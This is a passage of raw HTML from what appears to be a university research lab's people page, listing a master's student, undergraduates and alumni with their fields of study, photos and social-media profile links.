1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c201-outer\">\n            <div data-colibri-id=\"182-c201\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c201 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c202\" class=\"d-block style-854 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-1663377340901.jpg\" class=\"wp-image-1657 style-854-image style-local-182-c202-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c202-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"h-global-transition-all h-heading style-850 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c203\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c204\" class=\"h-text h-text-component style-851 style-local-182-c204 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c205\" class=\"h-text h-text-component style-902 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"style-855 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c131\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c131 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c138\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c138 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c139-outer\">\n            <div data-colibri-id=\"182-c139\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c139 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c140\" class=\"h-global-transition-all h-heading style-844 style-local-182-c140 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c140\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c132\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c132 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c133-outer\">\n            <div data-colibri-id=\"182-c133\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c133 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c134\" class=\"d-block style-831 style-local-182-c134 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c134-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c134-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c135\" class=\"h-global-transition-all h-heading style-832 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c135\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-text h-text-component style-833 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"style-835 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c207-outer\">\n            <div data-colibri-id=\"182-c207\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c207 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c208\" class=\"d-block style-831 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c208-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c208-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c209\" class=\"h-global-transition-all h-heading style-832 style-local-182-c209 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c209\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raiyan</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c210\" class=\"h-text h-text-component style-833 style-local-182-c210 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c211\" class=\"style-835 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c141\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c141 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c192\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c192 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c193-outer\">\n            <div data-colibri-id=\"182-c193\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c193 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c194\" class=\"h-global-transition-all h-heading style-926 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c194\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c142\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c142 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c143-outer\">\n            <div data-colibri-id=\"182-c143\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c143 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c144\" class=\"d-block style-913 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c144-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c144-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"h-global-transition-all h-heading style-914 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c145\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c146\" class=\"h-text h-text-component style-915 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"style-917 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c148-outer\">\n            <div data-colibri-id=\"182-c148\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c148 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c149\" class=\"d-block style-918 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c149-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c149-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c150\" class=\"h-global-transition-all h-heading style-914 style-local-182-c150 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c150\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c151\" class=\"h-text h-text-component style-915 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"style-919 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c153-outer\">\n            <div data-colibri-id=\"182-c153\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c153 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c154\" class=\"d-block style-920 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c154-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c154-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c155\" class=\"h-global-transition-all h-heading style-914 style-local-182-c155 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c155\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c156\" class=\"h-text h-text-component style-915 style-local-182-c156 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c157\" class=\"style-921 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" 